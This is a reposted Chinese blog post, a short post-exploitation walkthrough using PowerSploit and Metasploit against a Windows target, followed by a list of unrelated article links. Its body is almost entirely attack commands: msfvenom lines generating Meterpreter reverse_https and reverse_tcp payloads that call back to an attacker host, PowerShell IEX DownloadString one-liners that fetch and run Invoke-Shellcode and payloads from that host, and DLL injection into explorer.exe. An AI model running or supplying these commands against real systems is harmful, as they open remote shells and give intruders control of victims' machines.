博客
关于我
强烈建议你试试无所不能的chatGPT,快点击我
【后渗透】PowerSploit
阅读量:5370 次
发布时间:2019-06-15

本文共 1008 字,大约阅读时间需要 3 分钟。

1、下载安装:git clone 

2、搭建web服务器(如172.16.12.2),将powersploit置于web根目录下

3、msfvenom生成反弹木马(目标是windows系统)

http反弹:msfvenom -p windows/x64/meterpreter/reverse_https lhost=172.16.12.2 lport=4444 -f powershell -o /var/www/html/test

tcp反弹:msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=172.16.12.2 lport=4444 -f dll -o /var/www/html/test.dll

4、msf下开启监听

5、第一种目标powershell环境中执行Invoke-Shellcode,脚本:

IEX(New-Object Net.Webclient).DownloadString("http://172.16.12.2/PowerSploit/CodeExecution/Invoke-Shellcode.ps1") IEX(New-Object Net.Webclient).DownloadString("http://172.16.12.2/code") Invoke-Shellcode -Shellcode $buf -Force

第二种执行Invoke-DllIjection,脚本:

IEX(New-Object Net.Webclient).DownloadString("http://172.16.12.2/PowerSploit/CodeExecution/Invoke-DllInjection.ps1") IEX(New-Object Net.Webclient).DownloadString("http://192.168.233.128/code.dll") ps -Name explorer Invoke-DllInjection -Dll .\code.dll -ProcessID 3588

注释:第三条命令是查找explorer进程的进程号,之后将dll文件注入到此进程中

 

转载于:https://www.cnblogs.com/peterpan0707007/p/9381783.html

你可能感兴趣的文章
前端面试常考知识点---CSS
查看>>
Dedication(转)
查看>>
java9新特性-7-语法改进:接口的私有方法
查看>>
第四次实训作业
查看>>
转载:OpenCV2.2无法打开摄像头的解决办法
查看>>
110303_Common Permutation(公共排列)
查看>>
Login Verification CodeForces - 928A (实现)
查看>>
windows RT Xamltoolkit
查看>>
tomcat的request和response小案例
查看>>
c# 与 Mysql 的通讯方式总结
查看>>
线程问题---在iPad上会崩溃,在iPhone上不会崩溃
查看>>
解决 vim 报错:the imp module is deprecated in favour of importlib
查看>>
LeetCode Happy Number
查看>>
Oozie_示例
查看>>
tcp三次握手,四次挥手
查看>>
网易JS面试题与Javascript词法作用域说明
查看>>
PHP session 写入数据库中的方法
查看>>
HDU 3639 Bone Collector II(01背包第K优解)
查看>>
python-接口开发flask模块(三)开发登陆接口
查看>>
一个简单的定时器
查看>>